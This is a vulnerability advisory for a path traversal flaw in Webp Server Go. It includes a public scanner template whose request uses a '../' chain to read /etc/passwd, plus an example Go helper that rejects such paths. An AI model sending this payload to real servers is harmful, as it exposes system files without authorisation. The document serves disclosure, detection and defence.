webp-server-lfi: Webp Server Go - Path Traversal

Date: 2025-08-01 | Affected software: Webp Server Go | PoC: public

Vulnerability description

Webp Server Go has a path traversal vulnerability. Attackers can use the vulnerability to access arbitrary files.

PoC code [public]

id: webp-server-lfi

info:
  name: Webp Server Go - Path Traversal
  author: ritikchaddha
  severity: high
  description: |
    Webp Server Go has an Path Traversal vulnerability. Attackers can use the vulnerability to access arbitraty file.
  reference:
    - https://github.com/webp-sh/webp_server_go/issues/92
  metadata:
    max-request: 1
    verified: true
    fofa-query: header="Webp-Server-Go"
  tags: webp,webp-server,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../../../../etc/passwd"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - 'contains(server, "Webp-Server-Go")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100afccf9d5bc55474bd42ef2f08d0581d6b85598b6d745d1365af527b03c2d1f26022043004a7c4fbaff471915a8647db0cf0222f2f9706f2c1943d0e8b22ae33241ed:922c64590222798bb761d5b6d8e72950
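
An added example, not code from Webp Server Go or from the template author: one way a Go file server can refuse the request path used in the template above, by resolving it against the image root and rejecting anything that lands outside. The helper name `ResolveUnderRoot`, the root `/srv/img` and the sample paths are assumptions made for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path/filepath"
	"strings"
)

// ErrTraversal reports a request path that resolves outside the image root.
var ErrTraversal = errors.New("request path escapes image root")

// ResolveUnderRoot (hypothetical helper) maps a raw URL path to a file path
// below root, or returns ErrTraversal. The check is lexical only: symlinks
// inside root are not followed or inspected.
func ResolveUnderRoot(root, rawPath string) (string, error) {
	// Decode first so %2e%2e%2f is judged the same way as ../
	decoded, err := url.PathUnescape(rawPath)
	if err != nil || strings.ContainsRune(decoded, 0) {
		return "", fmt.Errorf("malformed request path %q", rawPath)
	}
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	// Join cleans the result, collapsing every ".." segment.
	candidate := filepath.Join(absRoot, filepath.FromSlash(decoded))
	// Express the cleaned path relative to root; a leading ".." means escape.
	rel, err := filepath.Rel(absRoot, candidate)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrTraversal
	}
	return candidate, nil
}

func main() {
	// Constructed sample request paths; the second is the template's path.
	for _, p := range []string{
		"/photos/cat.jpg",
		"/../../../../../../../../../../../etc/passwd",
		"/%2e%2e/%2e%2e/etc/passwd",
	} {
		resolved, err := ResolveUnderRoot("/srv/img", p)
		fmt.Printf("%-48s -> %q err=%v\n", p, resolved, err)
	}
}
```

A handler would call the helper before any file open and answer with an error status whenever it returns a non-nil error.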
